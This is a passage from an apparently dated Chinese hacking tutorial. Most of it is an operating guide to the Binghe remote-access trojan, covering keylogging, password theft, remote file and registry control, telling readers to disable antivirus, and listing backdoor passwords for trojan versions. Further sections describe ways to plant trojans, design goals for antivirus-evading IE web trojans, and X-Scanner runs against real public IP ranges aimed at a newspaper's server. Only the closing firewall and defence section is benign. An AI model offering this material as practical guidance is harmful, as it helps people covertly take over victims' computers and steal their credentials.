然后由目标操作者亲手将其安装到系统中,虽然这一切都是没有经过目标操作者授权的,然 而从某种程度上说,这的确是在经过诱惑后目标“心甘情愿”接收木马的,当 Server 安装 成功后,黑客就可以通过 Client 控制程序对 Server 端进行各种操作了。 木马程序的 Server 端为了隐藏自己,必须在设计中做到不让自己显示到任务栏或者系统进 程控制器中,同时还不会影响其他程序的正常运行,当使用者电脑处于断线状态下,Server 段不会发送任何信息到预设的端口上,而会自动检测网络状态直到网络连接好,Server 会通 过 email 或者其他形式将 Server 端系统资料通知 Client 端,同时接收 Client 发送出来的请求。 二.木马实战: 先说国产木马老大,冰河-----你不得不了解的工具。 (编者残语:)说到冰河,也许在 2005 年的今天显得很落后,但冰河创造了一个时代,一个 人人能做黑客的时代。使用方便简单,人人都能上手。图形界面,中文菜单,了解木马,先 从了解远程控制软件冰河开始。 ====================================================== 使用冰河前,请注意:如果你的机器有杀毒软件,可能会出现病毒提示。说实话,他还真是 一个病毒。呵呵。所以在使用前,请慎重考虑,出了问题,小编可担当不起。建议使用不管 是客户端还是服务端都请关闭杀毒软件以达到更好的使用效果。 ====================================================== 71 软件功能概述: 该软件主要用于远程监控,具体功能包括: 1.自动跟踪目标机屏幕变化,同时可以完全模拟键盘及鼠标输入,即在同步被控端屏幕变化 的同时,监控端的一切键盘及鼠标操作将反映在被控端屏幕(局域网适用); 2.记录各种口令信息:包括开机口令、屏保口令、各种共享资源口令及绝大多数在对话框 中出现过的口令信息,且 1.2 以上的版本中允许用户对该功能自行扩充,2.0 以上版本还同 时提供了击键记录功能; 3.获取系统信息:包括计算机名、注册公司、当前用户、系统路径、操作系统版本、当前 显示分辨率、物理及逻辑磁盘信息等多项系统数据; 4.限制系统功能:包括远程关机、远程重启计算机、锁定鼠标、锁定系统热键及锁定注册 表等多项功能限制; 5.远程文件操作:包括创建、上传、下载、复制、删除文件或目录、文件压缩、快速浏览 文本文件、远程打开文件(提供了四中不同的打开方式——正常方式、最大化、最小化和隐 藏方式)等多项文件操作功能; 6.注册表操作:包括对主键的浏览、增删、复制、重命名和对键值的读写等所有注册表操 作功能; 7.发送信息:以四种常用图标向被控端发送简短信息; 8.点对点通讯:以聊天室形式同被控端进行在线交谈。 一.文件列表: 1. G_Server.exe: 被监控端后台监控程序(运行一次即自动安装,可任意改名),在安装前可以 先通过'G_Client'的'配置本地服务器程序'功能进行一些特殊配置,例如是否将动态 IP 发送到 指定信箱、改变监听端口、设置访问口令等); 2. G_Client.exe: 监控端执行程序,用于监控远程计算机和配置服务器程序。 二.准备工作: 冰河是一个基于 TCP/IP 协议和 WINDOWS 操作系统的网络工具,所以首先应确保该协议已 被安装且网络连接无误,然后配置服务器程序(如果不进行配置则取默认设置),并在欲监控 的计算机上运行服务器端监控程序即可。 三.升级方法: 72 由于冰河 2.0 的改版较大,所以 2.0 以后版本与以前各版本完全不兼容。为此只能向老用户 提供一套升级方案:对于 1.1 版本的用户(好象已经没什么人用了),可以先用 1.1 或 1.2 版的 CLIENT 端将新版本的 SERVER 程序上传至被监控端,然后执行'文件打开'命令即可;对于 1.2 版本的用户相对简单,只要通过 1.2 版的 CLIENT 远程打开新版本的 SERVER 程序就可 以自动升级了。2.0 以后的各版本完全兼容。 'DARKSUN 专版'中还提供了另一种升级方法,可以免去在不同版本中切换的麻烦。如果您 不能确定远程主机的冰河版本,在用'文件管理器'浏览目录前,最好先在工具栏下的'当前连 接'列表框中选择打算连接的主机,然后直接点'升级 1.2 版本'按钮进行升级,如果返回的信 息是'无法解释的命令',那说明远程主机安装了 2.0 以上版本,具体的版本及系统信息可以 通过'命令控制台'的'口令类命令\系统信息及口令\系统信息'来查看。 四.各模块简要说明: 安装好服务器端监控程序后,运行客户端程序就可以对远程计算机进行监控了,客户端执行 程序的各模块功能如下: 1. "添加主机": 将被监控端 IP 地址添加至主机列表,同时设置好访问口令及端口,设置将保 存在'Operate.ini'文件中,以后不必重输。如果需要修改设置,可以重新添加该主机,或在主 界面工具栏内重新输入访问口令及端口并保存设置; 2. "删除主机": 将被监控端 IP 地址从主机列表中删除(相关设置也将同时被清除); 3. "自动搜索": 搜索指定子网内安装有'冰河'的计算机。(例如欲搜索 IP 地址'192.168.1.1'至 '192.168.1.255'网段的计算机,应将'起始域'设为'192.168.1',将'起始地址'和'终止地址'分别设为 '1'和'255'); 4. "查看屏幕": 查看被监控端屏幕(相当于命令控制台中的'控制类命令\捕获屏幕\查看屏幕 '); 5. "屏幕控制": 远程模拟鼠标及键盘输入(相当于命令控制台中的'控制类命令\捕获屏幕\屏 幕控制')。其余同"查看屏幕"; 6. "冰河信使": 点对点聊天室,也就是传说中的'二人世界'; 7. "升级 1.2 版本": 通过'DARKSUN 专版'的冰河来升级远程 1.2 版本的服务器程序; 8. "修改远程配置": 在线修改访问口令、监听端口等服务器程序设置,不需要重新上传整个 文件,修改后立即生效; 9. "配置本地服务器程序": 在安装前对'G_Server.exe'进行配置(例如是否将动态 IP 发送到指 定信箱、改变监听端口、设置访问口令等)。 73 五.文件管理器操作说明: 文件管理器对文件操作提供了下列鼠标操作功能: 1. 文件上传:右键单击欲上传的文件,选择'复制',在目的目录中粘贴即可。也可以在目的 目录中选择'文件上传自',并选定欲上传的文件; 2. 文件下载:右键单击欲下载的文件,选择'复制',在目的目录中粘贴即可。也可以在选定 欲下载的文件后选择'文件下载至',并选定目的目录及文件名; 3. 打开远程或本地文件:选定欲打开的文件,在弹出菜单中选择'远程打开'或'本地打开',对 于可执行文件若选择了'远程打开',可以进一步设置文件的运行方式和运行参数(运行参数可 为空); 4. 删除文件或目录:选定欲删除的文件或目录,在弹出菜单中选择'删除'; 5. 新建目录:在弹出菜单中选择'新建文件夹'并输入目录名即可; 6. 文件查找:选定查找路径,在弹出菜单中选择'文件查找',并输入文件名即可(支持通配符); 7. 拷贝整个目录(只限于被监控端本机):选定源目录并复制,选定目的目录并粘贴即可。 六.命令控制台主要命令: 1. 口令类命令: 系统信息及口令、历史口令、击键记录; 2. 控制类命令: 捕获屏幕、发送信息、进程管理、窗口管理、鼠标控制、系统控制、其它控 制(如'锁定注册表'等); 3. 网络类命令: 创建共享、删除共享、查看网络信息; 4. 文件类命令: 目录增删、文本浏览、文件查找、压缩、复制、移动、上传、下载、删除、 打开(对于可执行文件则相当于创建进程); 5. 注册表读写: 注册表键值读写、重命名、主键浏览、读写、重命名; 6. 设置类命令: 更换墙纸、更改计算机名、读取服务器端配置、在线修改服务器配置。 七.使用技巧: 1. 用'查看屏幕'命令抓取对方屏幕信息后,若希望程序自动跟踪对方的屏幕变化,在右键弹出 菜单中选中'自动跟踪'项即可; 2. 在文件操作过程中,鼠标双击本地文件将在本地开该文件;鼠标双击远程文件将先下载该 74 文件至临时目录,然后在本地打开; 3. 在使用'网络共享创建'命令时,如果不希望其他人看到新创建的共享名,可以在共享名后 加上'$'符号。自己欲浏览时只要在 IE 的地址栏或'开始菜单'的'运行'对话框内键入'\\[机器 名]\[共享名(含'$'符号)]即可; 4. 在 1.2 以后的版本中允许用户设定捕获图像的色深(1~7 级),图像将按设定保存为 2 的 N 次方种颜色(N=2 的[1~7]次方),即 1 级为单色,2 级为 16 色,3 级为 256 色,依此类推。 需要说明的是如果将色深设为 0 或 8 则表示色深依被监控端当前的分辨率而定,适当减小色 深可以提高图像的传输速度。 2.1 以后的版本新增了以 JPEG 格式传输图像的功能,以利于在 INTERNET 上传输图像,但 这项功能只适用于 2.1 以上版本(制被控端),否则实际上仍是通过 BMP 图象格式传输,所以 请先确认版本后再使用。 八.常见问题: 1. 安装不成功,该问题通常是由于 TCP/IP 协议安装或设置不正确所致; 2. 被监控端启动时或与监控端连接时弹出'建立连接'对话框,该问题是由于系统设置了自动 拨号属性。可以通过安装前定制服务器程序来禁止自动拨号; 3. 可以连接但没有反应,通常是版本不匹配所致,因为 1.2 以前的版本设计上存在缺陷,所 以如果您不能确定远程主机的冰河版本,最好先按照前面所说的升级办法试一下,否则被监 控端可能会出现错误提示。另外冰河没有提供代理功能,局域网外无法监控局域网内的机器, 除非被控端是网关; 4. '更换墙纸'命令无效,这个问题的可能性太多了,较常见的原因是被监控端的桌面设置为' 按 WEB 页查看'; 5. 对被监控端进行文件或目录的增删操作后,少数情况不会自动刷新,可以通过[Ctrl+R]或 选择弹出菜单的'刷新'命令手动刷新; 6. 开机口令不正确,因为 CMOS 口令是单向编码,所以编码后的口令是不可逆也是不唯一 的,冰河通过穷举算出来的口令可能与原口令不符,但也是有效口令。毛主席说过没有调查 就没有发言权,所以没有试过就千万别妄下定论; 7. 占用系统资源过高,其实准确的说应该是 CPU 利用率过高,系统资源占用并不算过分, 这主要是不断探测口令信息(敏感字符)造成的,所以在'DARKSUN 专版'中允许用户将该功 能屏蔽(我实在不知道怎样才能兼顾鱼和熊掌),只要在配置时清空'敏感字符'中的所有字符串 就行了。 8. 如何卸载冰河,这是我解答次数最多的一个问题,其实冰河 1.2 正式版以后的各版本都在 75 CLIENT 端提供了彻底的卸载功能。对于 1.2 版本,请执行命令列表中的'自动卸载'命令,对 其以后的版本,请执行'命令控制台'中的'控制类命令\系统控制\自动卸载冰河'。 小编有言:说说卸冰河木马方法和冰河的通用密码 很多朋友问我中了木马“冰河”有什么方法可以卸掉,其实很简单,有两个方法: (1)用杀毒软件“金山毒霸”就可以卸掉。但有朋友说用“金山”卸掉“冰河”后 打不开本文文件了,那你可以用手动方法去卸。如果你觉得那个办法太麻烦,可以用我介绍 的第二种方法。 (2)用“冰河”卸“冰河”: 如果你确定你的机器种了冰河,那你上网后开启冰河。 在增 添主机那里添自己的 IP。 然后电击自己的 IP, 选命令控制台那里选控制命令里的系统命 令。 然后自己看啦。不要再说你不会啊。我会晕的啊。:) 冰河通用密码 3.0 版:yzkzero.51.net 3.0 版:yzkzero! 3.1-netbug 版密码: 123456!@ 2.2 杀手专版:05181977 2.2 杀手专版:dzq2000! 文:残 了解如何种植木马才能防止别人种植木马。看看一般人用的手段。(本文比较适合入门级别 选手) 1.网吧种植 这个似乎在以前很流行,先关闭网吧的放火墙,再安装木马客户端,立刻结帐下机,注意, 重点是不要重起机器,因为现在网吧都有还原精灵,所以在不关机器的情况下,木马是不会 给发现的。因此,在网吧上网,首先要重起机器,其次看看杀毒软件有没有打开。最后建议, 不要在网吧打开有重要密码的东西,如网络银行等。毕竟现在木马客户端躲避防火墙的能力 很强,其次是还存在其他的病毒。 2.通讯软件传送 发一条消息给你,说,“这个我的照片哦,快看看。”当你接受并打开的时候,你已经中了木 马了。(此时,你打开的文件好象“没有任何反应”)“她”可能接着说说:“呀,发错了。再 76 见。”防御:不要轻易接受别人传的东西,其次是打开前要用杀毒软件查毒。 3.恐怖的捆绑 捆绑软件现在很多,具体使用就是把木马客户端和一个其他文件捆绑在一起(拿 JPG 图象 为例),你看到的文件可能是.jpg,图标也是正常(第 2 条直接传的木马客户端是个 windows 无法识别文件的图标,比较好认),特别是现在有些捆绑软件对捆绑过后的软件进行优化, 杀毒软件很难识别其中是否包含木马程序。建议:不要打开陌生人传递的文件。特别是图象 文件。(诱惑力大哦) 4.高深的编译 对木马客户程序进行编译。让木马更加难以识别。(其实效果同第三条) 5.微妙的网页嵌入 将木马安装在自己的主页里面,当你打开页面就自动下载运行。(见下篇,打造网页木马) “你中奖了,请去 www.**.com 领取你的奖品”,黑客可能这么和你说。建议:陌生人提供 的网页不要打开,不要去很奇怪名字的网站。及时升级杀毒软件。 总结:及时升级杀毒软件。不要打开未知文件以及陌生人传来的文件。不要随便打开陌生网 页。升级最新版本的操作系统。还有....请看本专题以后的文章咯。 ============================================================ 你也可以当黑客 打造完美的 IE 网页木马 (残语:比较适合黑客中级选手,日后将推出视频教程) 既然要打造完美的 IE 网页木马,首先就必须给我们的完美制定一个标准,我个人认为一个 完美的IE网页木马至少应具备下列四项特征: 一:可以躲过杀毒软件的追杀; 二:可以避开网络防火墙的报警; 三:能够适用于多数的 Windows 操作系统(主要包括 Windows 98、Windows Me、Windows 2000、Windows XP、Windows 2003)中的多数 IE 版本(主要包括 IE5.0、IE5.5、IE6.0), 最好能打倒 SP 补丁; 四:让浏览者不容易发觉 IE 变化,即可以悄无声息,从而可以长久不被发现。 77 (注意以上四点只是指网页本身而言,但不包括你的木马程序,也就是说我们的网页木马只 是负责运行指定的木马程序,至于你的木马程序的好坏只有你自己去选择啦!别找我要,我 不会写的哦!) 满足以上四点我想才可以让你的马儿更青春更长久,跑的更欢更快…… 看了上面的几点你是不是心动拉?别急,我们还是先侃侃现有的各种IE网页木马的不足 吧! 第一种:利用古老的 MIME 漏洞的IE网页木马 这种木马现在还在流行,但因为此漏洞太过古老且适用的IE版本较少,而当时影响又太大, 补丁差不多都补上啦,因此这种木马的种植成功率比较低。 第二种:利用 com.ms.activeX.ActiveXComponent 漏洞,结合WSH及FSO控件的IE网 页木马 虽然 com.ms.activeX.ActiveXComponent 漏洞广泛存在于多数IE版本中,是一个比较好的 漏洞,利用价值非常高,但却因为它结合了流行的病毒调用的WSH及FSO控件,使其虽 说可以避开网络防火墙的报警,可逃不脱杀毒软件的追捕(如诺顿)。 第三种:利用 OBJECT 对象类型确认漏洞(ObjectDataRemote)并结合 WSH及FSO控件的IE网页木马(典型的代表有动鲨网页木马生成器) 此种木马最大的优点是适应的IE版本多,且漏洞较新,但却有如下不足: 1、因为此漏洞要调用 Mshta.exe 来访问网络下载木马程序,所以会引起防火墙报警(如天 网防火墙); 2、如果此IE网页木马又利用了WSH及FSO控件,同样逃不脱杀毒软件的追捕(如诺 顿),而动鲨网页木马又恰恰使用了WSH及FSO控件,叹口气……可惜呀……? 3、再有就是这个漏洞需要网页服务器支持动态网页如ASP、JSP、CGI等,这就影 响了它的发挥,毕竟现在的免费稳定的动态网页空间是少之又少;虽说此漏洞也可利用邮件 MIME的形式来利用,但经测试发现对IE6.0不起作用。 看到上面的分析你是不是有了这种感觉:千军易得,一将难求,马儿成群,奈何千里马难寻! 别急,下面让我带这大家一起打造我心中的完美IE网页木马。 ======================================================= 扫描器的使用 78 这里我使用 x-scanner 作为介绍对象,原因是 x-scanner 集成了多种扫描功能于一身,它可以 采用多线程方式对指定 IP 地址段(或独立 IP 地址)进行安全漏洞扫描,提供了图形界面和 命令行两种操作方式,扫描内容包括:标准端口状态及端口 banner 信息、CGI 漏洞、RPC 漏洞、SQL-SERVER 默认帐户、FTP 弱口令,NT 主机共享信息、用户信息、组信息、NT 主机弱口令用户等。扫描结果保存在/log/目录中,index_*.htm 为扫描结果索引文件。对于 一些已知的 CGI 和 RPC 漏洞,x-scanner 给出了相应的漏洞描述、利用程序及解决方案,节 省了查找漏洞介绍的时间。 首先 x-scanner 包括了两个运行程序:xscann.exe 和 xscan_gui.exe,这两个程序分别是扫描器 的控制台版本和窗口版本,作为初学者可能更容易接受窗口版本的扫描软件,因为毕竟初学 者使用最多的还是“应用程序”,无论运行那一个版本,他们的功能都是一样的。首先让我 们运行窗口版本看看:窗口分为左右两部分,左面是进行扫描的类型,这包括前面提到的漏 洞扫描、端口扫描等基本内容;另一部分是有关扫描范围的设定,xscanner 可以支持对多个 IP 地址的扫描,也就是说使用者可以利用 xscanner 成批扫描多个 IP 地址,例如在 IP 地址范 围内输入 211.100.8.1-211.100.8.255 就会扫描整个 C 类的 255 台服务器(如果存在的话),这 样黑客可以针对某一个漏洞进行搜索,找到大范围内所有存在某个漏洞的服务器。当然如果 只输入一个 IP 地址,扫描程序将针对单独 IP 进行扫描。 剩下的端口设定在前面已经介绍过,一般对于网站服务器,这个端口选取 80 或者 8080,对 于某些特殊的服务器也许还有特殊的端口号,那需要通过端口扫描进行寻找。多线程扫描是 这个扫描器的一大特色,所谓多线程就是说同时在本地系统开辟多个 socket 连接,在同一 时间内扫描多个服务器,这样做的好处是提高了扫描速度,节省时间,根据系统的资源配置 高低,线程数字也可以自行设定(设定太高容易造成系统崩溃)。 在图形界面下我们看到了程序连接地址“.\xscan.exe”,这实际上就是 xscanner 的控制台程序, 也就是说图形窗口只是将控制台扫描器的有关参数设置做了“傻瓜化”处理,程序运行真正 执行的还是控制台程序。因此学习控制台是黑客所必需的,而且使用控制台模式的程序也是 真正黑客喜爱的操作方式。 现在我们进行一个简单的 cgi 漏洞扫描,这次演练是在控制台模式下进行的:xscan 211.100.8.87 -port 这个命令的意思是让 xscanner 扫描服务器 211.100.8.87 的开放端口,扫描器不会对 65535 个 端口全部进行扫描(太慢),它只会检测网络上最常用的几百个端口,而且每一个端口对应 的网络服务在扫描器中都已经做过定义,从最后返回的结果很容易了解服务器运行了什么网 络服务。扫描结果显示如下: Initialize dynamic library succeed. Scanning 211.100.8.87 ...... [211.100.8.87]: Scaning port state ... 79 [211.100.8.87]: Port 21 is listening!!! [211.100.8.87]: Port 25 is listening!!! [211.100.8.87]: Port 53 is listening!!! [211.100.8.87]: Port 79 is listening!!! [211.100.8.87]: Port 80 is listening!!! [211.100.8.87]: Port 110 is listening!!! [211.100.8.87]: Port 3389 is listening!!! [211.100.8.87]: Port scan completed, found 7. [211.100.8.87]: All done. 这个结果还会同时在 log 目录下生成一个 html 文档,阅读文档可以了解发放的端口对应的 服务项目。从结果中看到,这台服务器公开放了七个端口,主要有 21 端口用于文件传输、 80 端口用于网页浏览、还有 110 端口用于 pop3 电子邮件,如此一来,我们就可以进行有关 服务的漏洞扫描了。(关于端口的详细解释会在后续给出) 然后可以使用浏览看看这个服务器到底是做什么的,通过浏览发现原来这是一家报社的电子 版面,这样黑客可以继续对服务器进行漏洞扫描查找服务器上是否存在 perl 漏洞,之后进 行进一步进攻。 漏洞扫描的道理和端口扫描基本上类似,例如我们可以通过扫描器查找 61.135.50.1 到 61.135.50.255 这 255 台服务器上所有开放了 80 端口的服务器上是否存在漏洞,并且找到存 在什么漏洞,则可以使用 xscan 61.135.50.1-61.135.50.255 -cgi 进行扫描,因为结果比较多, 通过控制台很难阅读,这个时候 xscanner 会在 log 下生成多个 html 的中文说明,进行阅读 这些文档比较方便。 二、扫描器使用问题: 载使用漏洞扫描器的过程中,学习者可能会经常遇到一些问题,这里给出有关问题产生的原 因和解决办法。扫描器的使用并不是真正黑客生涯的开始,但它是学习黑客的基础,所以学 习者应该多加练习,熟练掌握手中使用的扫描器,了解扫描器的工作原理和问题的解决办法。 1、为什么我找不到扫描器报告的漏洞? 扫描器报告服务器上存在某个存在漏洞的文件,是发送一个 GET 请求并接收服务器返回值 来判断文件是否存在,这个返回值在 HTTP 的协议中有详细的说明,一般情况下“200”是 文件存在,而“404”是没有找到文件,所以造成上面现象的具体原因就暴露出来了。 80 造成这个问题的原因可能有两种:第一种可能性是您的扫描器版本比较低,扫描器本身存在 “千年虫”问题,对于返回的信息扫描器在判断的时候,会错误的以为时间信息 2000 年 x 月 x 日中的 200 是“文件存在”标志,这样就会造成误报; 另外一种可能性是服务器本身对“文件不存在”返回的头部信息进行了更改,如果 GET 申 请的文件不存在,服务器会自动指向一个“没有找到页面”的文档,所以无论文件是否存在, 都不会将“404”返回,而是仍然返回成功信息,这样做是为了迷惑漏洞扫描器,让攻击者 不能真正判断究竟那个漏洞存在于服务器上。 这一问题的解决办法也要分情况讨论,一般说来第一种情况比较容易解决,直接升级漏洞扫 描器就可以了,对于第二种情况需要使用者对网络比较熟悉,有能力的话可以自己编写一个 漏洞扫描器,自己编写的扫描器可以针对返回文件的大小进行判断,这样就可以真正确定文 件是否存在,但这种方法对使用者的能力要求较高。 2、我使用的扫描器速度和网络速度有关系嘛? 关系不大。扫描器发送和接收的信息都很小,就算是同时发送上百个 GET 请求一般的电话 上网用户也完全可以做得到,影响扫描器速度的主要因素是服务器的应答速度,这取决于被 扫描服务器的系统运行速度。如果使用者希望提高自己的扫描速度,可以使用支持多线程的 扫描器,但是因为使用者本地电脑档次问题,也不可能将线程设置到上百个,那样的话会造 成本地系统瘫痪,一般使用 30 个线程左右比较合适。 另外对于很多网络服务器来说,为了防止黑客的扫描行为,可能会在防火墙上设置同一 IP 的单位时间 GET 申请数量,这样做目的就是避免黑客的扫描和攻击,所以在提高本地扫描 速度之前,应该先确认服务器没有相应的过滤功能之后再使用。 3、扫描器报告给我的漏洞无法利用是什么原因? 确切地说扫描器报告的不是“找到的漏洞”,而是找到了一个可能存在漏洞的文件,各种网 络应用程序都可能存在漏洞,但是在更新版本的过程中,老版本的漏洞会被修补上,被扫描 器找到的文件应该经过手工操作确认其是否是存在漏洞的版本,这可以通过阅读网络安全网 站的“安全公告”获得相应知识。 对于已经修补上漏洞的文件来说,也不代表它一定不再存有漏洞,而只能说在一定程度上没 有漏洞了,也许在明天,这个新版本的文件中又会被发现还存在其他漏洞,因此这需要网络 安全爱好者时刻关注安全公告。当然如果攻击者或者网络管理员对编程比较熟悉,也可以自 己阅读程序并力图自己找到可能的安全隐患,很多世界著名的黑客都是不依*他人,而是自 己寻找漏洞进行攻击的。 4、扫描器版本比较新,然而却从来没有找到过漏洞是什么原因? 有一些扫描器专门设计了“等待时间”,经过设置可以对等待返回信息的时间进行调整,这 就是说在“网络连接超时”的情况下,扫描器不会傻傻的一直等待下去。但如果你的网络速 81 度比较慢,有可能造成扫描器没有来得及接收返回信息就被认为“超时”而越了过去继续下 面的扫描,这样当然是什么也找不到啦。 如果问题真的如此,可以将等待时间设置的长一些,或者换个 ISP 拨号连接。 5、扫描器报告服务器没有提供 HTTP 服务? 网络上大多数 HTTP 服务器和漏洞扫描器的默认端口都是 80,而有少量的 HTTP 服务器并 不是使用 80 端口提供服务的,在确认服务器的确开通了网站服务的情况下,可以用端口扫 描器察看一下对方究竟使用什么端口进行的 HTTP 服务,网络上常见的端口还有 8080。 另外这种情况还有一种可能性,也许是使用者对扫描器的参数设置不正确造成的,很多扫描 器的功能不仅仅是漏洞扫描,有可能还提供了 rpc 扫描、ftp 默认口令扫描和 NT 弱口令扫描 等多种功能,因此在使用每一款扫描器之前,都应该自己阅读有关的帮助说明,确保问题不 是出在自己身上。 6、扫描器使用过程中突然停止响应是为什么? 扫描器停止响应是很正常的,有可能是因为使用者连接的线程过多,本地系统资源不足而造 成系统瘫痪、也可能是因为对方服务器的响应比较慢,依次发送出去的请求被同时反送回来 而造成信息阻塞、还有可能是服务器安装了比较恶毒的防火墙,一旦察觉有人扫描就发送特 殊的数据报回来造成系统瘫痪…… 因此扫描器停止响应不能简单的说是为什么,也没有一个比较全面的解决方案,不过一般情 况下遇到这种问题,我建议你可以更换其他扫描器、扫描另外一些服务器试试,如果问题还 没有解决,就可能是因为扫描器与你所使用的系统不兼容造成的,大多数基于微软视窗的漏 洞扫描器都是运行在 Windows9X 下的,如果是 Win2000 或者 NT 也有可能造成扫描器无法 正常工作。 7、下载回来的扫描器里面怎么没有可执行文件? 扫描器不一定非要是可执行的 exe 文件,其他例如 perl、cgi 脚本语言也可以编写扫描器, 因此没有可执行文件的扫描器也许是运行在网络服务器上的,这种扫描器可以被植入到网络 上的其它系统中,不需要使用者上网就能够 24 小时不停的进行大面积地址扫描,并将结果 整理、分析,最后通过 Email 发送到指定的电子信箱中,因此这是一种比较高级的扫描器, 初学者不适合使用。 另外注意载下在扫描器的时候注意压缩报文件的扩展名,如果是 tar 为扩展名,那么这个扫 描器是运行在 Linux 系统下的,这种其它操作平台的扫描器无法在视窗平台下应用,文件格 式也和 FAT32 不一样。 8、扫描器只报告漏洞名称,不报告具体文件怎么办? 只要漏洞被发现,网络安全组织即会为漏洞命名,因此漏洞名称对应的文件在相当广泛的范 82 围内都是统一的,只要知道了漏洞的名称,黑客就可以通过专门的漏洞搜索引擎进行查找, 并且学习到与找到漏洞相关的详细信息。这种“漏洞搜索引擎”在网络上非常多,例如我国 “绿盟”提供的全中文漏洞搜索引擎就是比较理想的一个。 =========================================================== 如何防范黑客 黑客对服务器进行扫描是轻而易举的,一旦找到了服务器存在的问题,那么后果将是严重的。 这就是说作为网络管理员应该采取不要的手段防止黑客对服务器进行扫描,本节我将谈谈如 何才能让自己的服务器免遭黑客扫描。 一、防范黑客心得体会: 1、屏蔽可以 IP 地址: 这种方式见效最快,一旦网络管理员发现了可疑的 IP 地址申请,可以通过防火墙屏蔽相对 应的 IP 地址,这样黑客就无法在连接到服务器上了。但是这种方法有很多缺点,例如很多 黑客都使用的动态 IP,也就是说他们的 IP 地址会变化,一个地址被屏蔽,只要更换其他 IP 仍然可以进攻服务器,而且高级黑客有可能会伪造 IP 地址,屏蔽的也许是正常用户的地址。 2、过滤信息包: 通过编写防火墙规则,可以让系统知道什么样的信息包可以进入、什么样的应该放弃,如此 一来,当黑客发送有攻击性信息包的时候,在经过防火墙时,信息就会被丢弃掉,从而防止 了黑客的进攻。但是这种做法仍然有它不足的地方,例如黑客可以改变攻击性代码的形态, 让防火墙分辨不出信息包的真假;或者黑客干脆无休止的、大量的发送信息包,知道服务器 不堪重负而造成系统崩溃。 3、修改系统协议: 对于漏洞扫描,系统管理员可以修改服务器的相应协议,例如漏洞扫描是根据对文件的申请 返回值对文件存在进行判断的,这个数值如果是 200 则表示文件存在于服务器上,如果是 404 则表明服务器没有找到相应的文件,但是管理员如果修改了返回数值、或者屏蔽 404 数 值,那么漏洞扫描器就毫无用处了。 4、经常升级系统版本: 任何一个版本的系统发布之后,在短时间内都不会受到攻击,一旦其中的问题暴露出来,黑 客就会蜂拥而致。因此管理员在维护系统的时候,可以经常浏览著名的安全站点,找到系统 的新版本或者补丁程序进行安装,这样就可以保证系统中的漏洞在没有被黑客发现之前,就 已经修补上了,从而保证了服务器的安全。 83 5、及时备份重要数据: 亡羊补牢,如果数据备份及时,即便系统遭到黑客进攻,也可以在短时间内修复,挽回不必 要的经济损失。想国外很多商务网站,都会在每天晚上对系统数据进行备份,在第二天清晨, 无论系统是否收到攻击,都会重新恢复数据,保证每天系统中的数据库都不会出现损坏。数 据的备份最好放在其他电脑或者驱动器上,这样黑客进入服务器之后,破坏的数据只是一部 分,因为无法找到数据的备份,对于服务器的损失也不会太严重。 然而一旦受到黑客攻击,管理员不要只设法恢复损坏的数据,还要及时分析黑客的来源和攻 击方法,尽快修补被黑客利用的漏洞,然后检查系统中是否被黑客安装了木马、蠕虫或者被 黑客开放了某些管理员账号,尽量将黑客留下的各种蛛丝马迹和后门分析清除、清除干净, 防止黑客的下一次攻击。 6、使用加密机制传输数据: 对于个人信用卡、密码等重要数据,在客户端与服务器之间的传送,应该仙经过加密处理在 进行发送,这样做的目的是防止黑客监听、截获。对于现在网络上流行的各种加密机制,都 已经出现了不同的破解方法,因此在加密的选择上应该寻找破解困难的,例如 DES 加密方 法,这是一套没有逆向破解的加密算法,因此黑客的到了这种加密处理后的文件时,只能采 取暴力破解法。个人用户只要选择了一个优秀的密码,那么黑客的破解工作将会在无休止的 尝试后终止。 二、防火墙使用说明: 1.什么是防火墙? 防火墙的英文叫做 firewall,它能够在网络与电脑之间建立一道监控屏障,保护在防火墙内 部的系统不受网络黑客的攻击。逻辑上讲,防火墙既是信息分离器、限制器,也是信息分析 器,它可以有效地对局域网和 Internet 之间的任何活动进行监控,从而保证局域网内部的安 全。 网络上最著名的软件防火墙是 LockDown2000,这套软件需要经过注册才能获得完整版本, 它的功能强大,小到保护个人上网用户、大到维护商务网站的运作,它都能出色的做出惊人 的表现。但因为软件的注册需要一定费用,所以对个人用户来说还是选择一款免费的防火墙 更现实。天网防火墙在这里就更加适合个人用户的需要了,天网防火墙个人版是一套给个人 电脑使用的网络安全程序,它能够抵挡网络入侵和攻击,防止信息泄露。 2、天网防火墙的基本功能: 天网防火墙个人版把网络分为本地网和互联网,可以针对来自不同网络的信息,来设置不同 的安全方案,以下所述的问题都是针对互联网而言的,故所有的设置都是在互联网安全级别 中完成的。 怎样防止信息泄露? 如果把文件共享向互联网开放,而且又不设定密码,那么 别人就可以轻松的通过互联网看到您机器中的文件,如果您还允许共享可写,那别人甚至可 以删除文件。 你可以在个人防火墙的互联网安全级别设置中,将 NETBIOS 关闭,这样别 84 人就不能通过 INTERNET 访问你的共享资源了(这种设置不会影响你在局域网中的资源共 享 )。 当拨号用户上网获得了分配到的 IP 地址之后,可以通过天网防火墙将 ICMP 关闭,这样黑 客用 PING 的方法就无法确定使用者的的系统是否处于上网状态,无法直接通过 IP 地址获 得使用者系统的信息了。 需要指出的是:防火墙拦截的信息并不完全是攻击信息,它记录的只是系统在安全设置中所 拒绝接收的数据包。在某些情况下,系统可能会收到一些正常但又被拦截的数据包,例如某 些路由器会定时发出一些 IGMP 包等;或有些主机会定时 PING 出数据到本地系统确认连接 仍在维持着,这个时候如果利用防火墙将 ICMP 和 IGMP 屏蔽了,就会在安全记录中见到这 些被拦截的数据包,因此这些拦截下来的数据包并不一定是黑客对系统进行攻击造成的。 3、使用防火墙的益处: 使用防火墙可以保护脆弱的服务,通过过滤不安全的服务,Firewall 可以极大地提高网络安 全和减少子网中主机的风险。例如,Firewall 可以禁止 NIS、NFS 服务通过,同时可以拒绝 源路由和 ICMP 重定向封包。 另外防火墙可以控制对系统的访问权限,例如某些企业允许从外部访问企业内部的某些系 统,而禁止访问另外的系统,通过防火墙对这些允许共享的系统进行设置,还可以设定内部 的系统只访问外部特定的 Mail Server 和 Web Server,保护企业内部信息的安全。 4、防火墙的种类: 防火墙总体上分为包过滤、应用级网关和代理服务器等三种类型: (1)数据包过滤 数据包过滤(Packet Filtering)技术是在网络层对数据包进行选择,选择的依据是系统内设置的 过滤逻辑,被称为访问控制表(Access Control Table)。通过检查数据流中每个数据包的源地 址、目的地址、所用的端口号、协议状态等因素,或它们的组合来确定是否允许该数据包通 过。 数据包过滤防火墙逻辑简单,价格便宜,易于安装和使用,网络性能和透明性好,它 通常安装在路由器上。路由器是内部网络与 Internet 连接必不可少的设备,因此在原有网络 上增加这样的防火墙几乎不需要任何额外的费用。 